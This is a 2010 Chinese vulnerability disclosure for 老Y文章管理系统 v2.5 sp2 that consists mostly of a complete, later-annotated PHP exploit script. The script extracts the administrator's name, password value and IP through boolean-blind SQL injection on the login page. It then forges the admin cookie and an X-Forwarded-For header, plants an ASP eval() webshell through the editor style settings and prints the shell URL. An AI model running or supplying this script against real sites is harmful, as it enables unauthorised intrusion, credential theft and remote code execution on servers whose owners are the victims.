老Y文章管理系统 v2.5 sp2 SQL注射&Cookies欺骗漏洞
来源:http://www.bksec.net 作者:My5t3ry 发布时间:2010-09-23  

老Y文章管理系统 v2.5 sp2 的 /user/UserLogin.asp 文件对登录用户名参数存在布尔型（盲注）SQL注射漏洞：下面的 exp 以登录响应中是否出现 Set-Cookie 作为真/假判据，逐字符猜解 Yao_Admin 表中管理员的账号、密码字段值以及登录 IP，恶意用户可据此读取数据库中的任意数据。另外后台登录校验处理不当：后台身份仅由 LaoYAdmin Cookie 中直接携带的 UserName/UserPass/UserID 决定，猜解出的密码字段值无需破解即可原样回放；管理员 IP 校验又信任 X-Forwarded-For 请求头，因此伪造上述 Cookie 与请求头即可欺骗登录后台。

漏洞测试 exp（PHP 命令行脚本，用法：php exp.php &lt;hostname&gt; &lt;path&gt;，path 为站点根路径，如 /）:

<?php
// No run-time limit: the blind probes cost one HTTP round trip per candidate
// character. error_reporting(7) is E_ERROR | E_WARNING | E_PARSE (notices hidden).
set_time_limit(0);
error_reporting(E_ERROR | E_WARNING | E_PARSE);
/**
 * Print the banner and command-line usage, then terminate the process.
 *
 * The banner title is a base64-encoded byte string (presumably GBK text naming
 * the target CMS; left untouched). The script name comes from the global $argv.
 * Never returns.
 */
function usage()
{
    global $argv;
    $rule  = "\n--+++============================================================+++--";
    $title = base64_decode("wM9ZzsTVwrncwO3Ptc2zdjIuNXNwMiBCbGluZCBTUUwgSW5qZWN0aW9uIEV4cGxvaXQ=");
    $banner = array(
        $rule,
        "\n--+++==== " . $title . " ====+++--",
        $rule,
        "\n\n[+] Author : My5t3ry",
        "\n[+] Team : http://www.t00ls.net",
        "\n[+] Blog : http://www.bksec.net",
        "\n[+] Usage : php " . $argv[0] . " <hostname> <path>",
        "\n[+] Ex. : php " . $argv[0] . " localhost /",
        "\n\n",
    );
    exit(implode('', $banner));
}

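/**
 * Build the URL-encoded boolean-blind injection payload for the Username field.
 *
 * Every payload has the shape  admin' or 1=1 and (<probe>) and '1'='1  so the
 * login's WHERE clause is true exactly when <probe> is true. Caveat: if a real
 * account literally named "admin" exists, the OR branch is always true and every
 * probe looks successful. The probes use asc()/mid()/len() against the
 * [Yao_Admin] table (Jet/Access-style SQL, as written by the original author).
 *
 * @param int $pos 1-based character position (modes 1, 2, 4) or candidate length (modes 3, 5)
 * @param int $chr ASCII code compared against the character at $pos (modes 1, 2, 4; unused otherwise)
 * @param int $chs probe selector: 1 Admin_Name char, 2 Admin_Pass char, 3 len(Admin_Name),
 *                 4 Admin_IP char, 5 len(Admin_IP)
 * @return string urlencoded payload
 * @throws InvalidArgumentException on an unknown $chs. The original silently
 *         returned an empty string here, which sends a meaningless request and
 *         makes the caller's brute-force loop spin; an explicit error is safer.
 */
function query($pos, $chr, $chs)
{
    $probes = array(
        1 => "(select asc(mid(Admin_Name,{$pos},1)) from [Yao_Admin] where id=1)={$chr}",
        2 => "(select asc(mid(Admin_Pass,{$pos},1)) from [Yao_Admin] where id=1)={$chr}",
        3 => "(select len(Admin_Name) from [Yao_Admin] where id=1)={$pos}",
        4 => "(select asc(mid(Admin_IP,{$pos},1)) from [Yao_Admin] where id=1)={$chr}",
        5 => "(select len(Admin_IP) from [Yao_Admin] where id=1)={$pos}",
    );
    if (!isset($probes[$chs])) {
        throw new InvalidArgumentException("query(): unknown probe selector {$chs}");
    }
    // The wrapper is identical for every mode; only the probe differs.
    return urlencode("admin' or 1=1 and " . $probes[$chs] . " and '1'='1");
}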

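/**
 * Send one blind-injection probe to User/Userlogin.asp and return the raw HTTP response.
 *
 * The probe (built by query()) goes into the Username POST field; the password
 * is a dummy. Callers decide true/false by looking for a "Set-Cookie: XXX=ID="
 * header in the result, so the full response including headers is returned.
 * "Accept-Encoding: gzip, deflate" is kept from the original: only the headers
 * are inspected, so a compressed body does not matter here.
 *
 * Fixes over the original: the connect and the read now have a 10 s bound (an
 * unresponsive host used to hang the whole brute-force loop), the failure
 * message reports the real socket error instead of the false handle, the write
 * is checked, and $reply is initialised before being appended to.
 *
 * @param string $hostname target host (plain HTTP, port 80)
 * @param string $path     web root path including the trailing slash, e.g. "/"
 * @param int    $pos      forwarded to query()
 * @param string $chr      candidate character; converted to its ASCII code here
 * @param int    $chs      probe selector forwarded to query()
 * @return string raw HTTP response (headers + body), possibly truncated on read timeout
 */
function exploit($hostname, $path, $pos, $chr, $chs)
{
    $chr = ord($chr);
    $conn = fsockopen($hostname, 80, $errno, $errstr, 10);
    if (!$conn) {
        exit("\r\n[-] No response from {$hostname}: {$errstr} ({$errno})");
    }
    stream_set_timeout($conn, 10);

    $postdata = "Username=" . query($pos, $chr, $chs) . "&PassWord=aaaaaa&Submit=%B5%C7%C2%BC";
    $headers = array(
        "POST " . $path . "User/Userlogin.asp?action=login HTTP/1.1",
        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*",
        "Accept-Language: zh-cn",
        "Content-Type: application/x-www-form-urlencoded",
        "Accept-Encoding: gzip, deflate",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
        "Host: $hostname",
        "Content-Length: " . strlen($postdata),
        // Fixed session id copied from the original; the target does not appear to
        // require a valid one (the cookie we look for is set on this very request).
        "Cookie: ASPSESSIONIDSSCTBRDD=ILJJFNOABJJHHDMPDBAEJIGC",
        "Connection: Close",
    );
    $message = implode("\r\n", $headers) . "\r\n\r\n" . $postdata;

    if (fwrite($conn, $message) === false) {
        fclose($conn);
        exit("\r\n[-] Failed to send request to {$hostname}");
    }

    $reply = '';
    while (!feof($conn)) {
        $chunk = fgets($conn, 1024);
        if ($chunk === false) {
            break; // read timeout or error: return what has been received so far
        }
        $reply .= $chunk;
    }
    fclose($conn);
    return $reply;
}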

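/**
 * Recover Admin_Name one character at a time with the boolean-blind probe $chs.
 *
 * For each position 1..$length (global, determined earlier by lengthcolumns())
 * the candidates in $key are tried in order; a probe is a hit when the response
 * carries a "Set-Cookie: XXX=ID=" header, i.e. the injected login succeeded.
 * The recovered name is appended to the global $user and echoed as it is found.
 *
 * Fix over the original: when no candidate matched a position (for example an
 * upper-case letter or punctuation in the name) $chr ran past the end of $key
 * and the loop never terminated. The candidate set is now extended and
 * exhaustion aborts with a message. Lower-case letters and digits are still
 * tried first, so names the original could recover produce identical results.
 *
 * @param string $hostname target host
 * @param string $path     web root path
 * @param int    $chs      probe selector for query() (1 = Admin_Name)
 */
function crkusername($hostname, $path, $chs)
{
    global $length, $user;
    $key = "abcdefghijklmnopqrstuvwxyz0123456789"
         . "ABCDEFGHIJKLMNOPQRSTUVWXYZ_-.@";
    $keylen = strlen($key);
    echo "[+] username: ";
    for ($pos = 1; $pos <= $length; $pos++) {
        $found = false;
        for ($chr = 0; $chr < $keylen; $chr++) {
            $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
            // The capture group is three letters, so a match implies a non-empty name.
            if (preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/', $response) === 1) {
                $user .= $key[$chr];
                echo $key[$chr];
                $found = true;
                break;
            }
        }
        if (!$found) {
            // Without the full name the forged admin cookie cannot work, so stop here.
            exit("\r\n[-] No candidate matched username position {$pos}; giving up.\r\n");
        }
    }
    echo "\n";
}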

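/**
 * Recover Admin_Pass one character at a time with the boolean-blind probe $chs.
 *
 * Candidates are the lower-case hex digits, so this recovers a hex-encoded
 * stored value. The original always probed exactly 18 positions; if the stored
 * value is an MD5 hex digest that constant looks arbitrary (16 or 32 would be
 * expected), but it is kept as the default of the new $maxlen parameter for
 * compatibility. The value is appended to the global $pass and echoed as found.
 *
 * Fix over the original: a position with no matching candidate (past the end
 * of the stored value, or a non-hex character) made $chr overrun $key and loop
 * forever. The scan now stops at that position and keeps what was recovered,
 * since getshell() replays the value as-is and a complete shorter hash is
 * still usable.
 *
 * @param string $hostname target host
 * @param string $path     web root path
 * @param int    $chs      probe selector for query() (2 = Admin_Pass)
 * @param int    $maxlen   number of positions to probe (default 18, as before)
 */
function crkpassword($hostname, $path, $chs, $maxlen = 18)
{
    global $pass;
    $key = "abcdef0123456789";
    $keylen = strlen($key);
    echo "[+] password: ";
    for ($pos = 1; $pos <= $maxlen; $pos++) {
        $found = false;
        for ($chr = 0; $chr < $keylen; $chr++) {
            $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
            if (preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/', $response) === 1) {
                $pass .= $key[$chr];
                echo $key[$chr];
                $found = true;
                break;
            }
        }
        if (!$found) {
            echo "\n[-] No hex candidate matched password position {$pos}; stopping with "
               . strlen($pass) . " characters.";
            break;
        }
    }
    echo "\n";
}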

/**
 * Find the length of a column via the boolean-blind length probe $chs.
 *
 * Candidate lengths 1..19 are tried in order; the first one whose login
 * response carries a "Set-Cookie: XXX=ID=" header is the real length. If none
 * of them matches the exploit cannot continue and the process exits. The
 * character argument is irrelevant for length probes, so 0 is passed.
 *
 * @param string $hostname target host
 * @param string $path     web root path
 * @param int    $chs      probe selector for query() (3 = len(Admin_Name), 5 = len(Admin_IP))
 * @return int the matched length (1..19)
 */
function lengthcolumns($hostname, $path, $chs)
{
    for ($candidate = 1; $candidate < 20; $candidate++) {
        $response = exploit($hostname, $path, $candidate, 0, $chs);
        if (preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/', $response, $match)
            && strlen(trim($match[1])) != 0) {
            return $candidate;
        }
    }
    exit("\r\n[+] Exploit Failed.\r\n");
}


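/**
 * Recover Admin_IP one character at a time with the boolean-blind probe $chs.
 *
 * For each position 1..$iplength (global, determined earlier by
 * lengthcolumns()) the digits and "." are tried in order; a hit is a response
 * carrying a "Set-Cookie: XXX=ID=" header. The result is appended to the global
 * $adminip, which getshell() later sends in X-FORWARDED-FOR. The candidate set
 * only covers dotted IPv4 text.
 *
 * Fix over the original: a position with no matching candidate (e.g. an IPv6
 * address or a non-address placeholder stored in Admin_IP) made $chr overrun
 * $key and loop forever; it now aborts with a message, since a partial IP is
 * useless for the spoofed header.
 *
 * @param string $hostname target host
 * @param string $path     web root path
 * @param int    $chs      probe selector for query() (4 = Admin_IP)
 */
function crkadminip($hostname, $path, $chs)
{
    global $iplength, $adminip;
    $key = "1234567890.";
    $keylen = strlen($key);
    echo "[+] adminip: ";
    for ($pos = 1; $pos <= $iplength; $pos++) {
        $found = false;
        for ($chr = 0; $chr < $keylen; $chr++) {
            $response = exploit($hostname, $path, $pos, $key[$chr], $chs);
            if (preg_match('/Set-Cookie:\s([A-Za-z]{3})=ID=/', $response) === 1) {
                $adminip .= $key[$chr];
                echo $key[$chr];
                $found = true;
                break;
            }
        }
        if (!$found) {
            exit("\r\n[-] No candidate matched admin IP position {$pos} (not a dotted IPv4 address?); giving up.\r\n");
        }
    }
    echo "\n";
}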

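/**
 * Log in to the admin area with forged credentials and plant an ASP backdoor
 * through the editor style settings. Returns the raw HTTP response.
 *
 * Two back-end weaknesses are used at once (both visible in the request built
 * below; not verified beyond that):
 *  - the admin cookie "LaoYAdmin" carries UserName/UserPass/UserID directly, and
 *    $pass is the value recovered from Admin_Pass, so the stored password
 *    representation is replayed as-is without cracking it;
 *  - the admin IP check is satisfied by an X-FORWARDED-FOR header carrying the
 *    recovered Admin_IP.
 * The POST to Admin/EditorAdmin/style.asp?action=StyleSetSave&id=2 sets
 * d_imageext to  gif|jpg|jpeg|bmp|":eval(request("my"))'  (url-encoded); the
 * caller expects that value to be written into an ASP config file, where the
 * eval() then executes whatever arrives in the "my" request parameter.
 *
 * Fixes over the original: connect/read timeouts, a failure message naming the
 * real socket error, a checked write, $reply initialised, and the
 * "Accept-Encoding: gzip, deflate" header dropped — the caller searches the
 * response body for a plain byte marker, which a compressed body would never
 * contain.
 *
 * @param string $hostname target host (plain HTTP, port 80)
 * @param string $path     web root path including the trailing slash
 * @param string $user     recovered Admin_Name
 * @param string $pass     recovered Admin_Pass value
 * @param string $adminip  recovered Admin_IP
 * @return string raw HTTP response (headers + body), possibly truncated on read timeout
 */
function getshell($hostname, $path, $user, $pass, $adminip)
{
    $conn = fsockopen($hostname, 80, $errno, $errstr, 10);
    if (!$conn) {
        exit("\r\n[-] No response from {$hostname}: {$errstr} ({$errno})");
    }
    stream_set_timeout($conn, 10);

    // Editor style-settings form copied verbatim from the original; d_imageext is
    // the injection point, every other field is whatever the form normally submits.
    $postdata = "d_name=user&d_initmode=EDIT&d_fixwidth=&d_skin=light1&d_width=500&d_height=300&d_stateflag=1&d_sbedit=1&d_sbview=1&d_detectfromword=1&d_autoremote=0&d_showborder=0&d_entermode=1&d_areacssmode=0&d_memo=500px%BF%ED%B6%C8%BD%E7%C3%E6%CF%C2%B5%C4%D7%EE%BC%F2%B9%A4%BE%DF%C0%B8%B0%B4%C5%A5%2C%CA%CA%BA%CF%D3%DA%D3%CA%BC%FE%CF%B5%CD%B3%C1%F4%D1%D4%CF%B5%CD%B3%B5%C8%D6%BB%D0%E8%D7%EE%BC%F2%B5%A5%B9%A6%C4%DC%B5%C4%D3%A6%D3%C3&d_uploadobject=0&d_autodir=2&d_allowbrowse=0&d_cusdirflag=0&d_baseurl=1&d_uploaddir=..%2Fuploadfiles%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7C%22%3Aeval%28request%28%22my%22%29%29%27&d_imagesize=0&d_flashext=swf&d_flashsize=0&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=0&d_fileext=rar%7Czip%7Cpdf%7Cdoc%7Cxls%7Cppt%7Cchm%7Chlp&d_filesize=0&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=0&d_localext=gif%7Cjpg%7Cbmp%7Cwmz%7Cpng&d_localsize=0&d_sltsyobject=0&d_sltsyext=jpg%7Cjpeg&d_sltflag=0&d_sltminsize=300&d_sltoksize=120&d_sywzflag=0&d_sywzminwidth=100&d_sywzminheight=100&d_sytext=%B0%E6%C8%A8%CB%F9%D3%D0...&d_syfontcolor=000000&d_syshadowcolor=FFFFFF&d_syshadowoffset=1&d_syfontsize=12&d_syfontname=%CB%CE%CC%E5&d_sywzposition=1&d_sywzpaddingh=5&d_sywzpaddingv=5&d_sywztextwidth=66&d_sywztextheight=17&d_sytpflag=0&d_sytpminwidth=100&d_sytpminheight=100&d_sytpposition=1&d_sytppaddingh=5&d_sytppaddingv=5&d_sypicpath=&d_sytpopacity=1&d_sytpimagewidth=88&d_sytpimageheight=31";

    $headers = array(
        "POST " . $path . "Admin/EditorAdmin/style.asp?action=StyleSetSave&id=2 HTTP/1.1",
        "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*",
        "Accept-Language: zh-cn",
        "Content-Type: application/x-www-form-urlencoded",
        "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
        "Host: $hostname",
        // Spoofs the source address the admin IP check compares against.
        "X-FORWARDED-FOR: " . $adminip,
        // Forged admin identity: the recovered name and stored password value, plus
        // the fixed session id from the original.
        "Cookie: ASPSESSIONIDCADSSCQQ=OKLJGOECENDGHDLAKKIKBCAB; LaoYAdmin=UserName=" . $user . "&UserPass=" . $pass . "&UserID=1",
        "Content-Length: " . strlen($postdata),
        "Connection: Close",
    );
    $message = implode("\r\n", $headers) . "\r\n\r\n" . $postdata;

    if (fwrite($conn, $message) === false) {
        fclose($conn);
        exit("\r\n[-] Failed to send request to {$hostname}");
    }

    $reply = '';
    while (!feof($conn)) {
        $chunk = fgets($conn, 1024);
        if ($chunk === false) {
            break; // read timeout or error: return what has been received so far
        }
        $reply .= $chunk;
    }
    fclose($conn);
    return $reply;
}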

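// ---- entry point ---------------------------------------------------------------
if ($argc != 3) {
    usage();
}
$hostname = $argv[1];
$path = $argv[2];
// Every request appends a relative file name to $path, so it must end with "/".
// (The original would have built "/siteUser/Userlogin.asp" from "/site".)
if ($path === '' || substr($path, -1) !== '/') {
    $path .= '/';
}

echo "[+] Len(username): ";
$length = lengthcolumns($hostname, $path, 3);
echo $length . "\n";
echo "[+] Len(adminip): ";
$iplength = lengthcolumns($hostname, $path, 5);
echo $iplength . "\n";

// These three fill the globals $user, $pass and $adminip used by getshell().
crkusername($hostname, $path, 1);
crkpassword($hostname, $path, 2);
crkadminip($hostname, $path, 4);

$reply = getshell($hostname, $path, $user, $pass, $adminip);

// Success marker: a high-bit byte string from the admin page (presumably GBK
// text, "style saved successfully"). The original tested it with eregi(), which
// was removed in PHP 7; a plain byte search is equivalent because the needle
// contains no ASCII letters, so case-insensitivity never applied.
$marker = chr(209) . chr(249) . chr(202) . chr(189) . chr(208) . chr(222)
        . chr(184) . chr(196) . chr(179) . chr(201) . chr(185) . chr(166);
if (strpos($reply, $marker) !== false) {
    echo "[+] Exploit finished.\r\n";
    // The original hard-coded "/" here and dropped $path, printing a wrong URL when
    // the application is not installed at the web root.
    echo "[+] shell:http://" . $hostname . $path . "Editor/asp/config.asp?my=response.write(now())\r\n";
} else {
    echo "[-] Exploit failed.\r\n";
}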
?>


 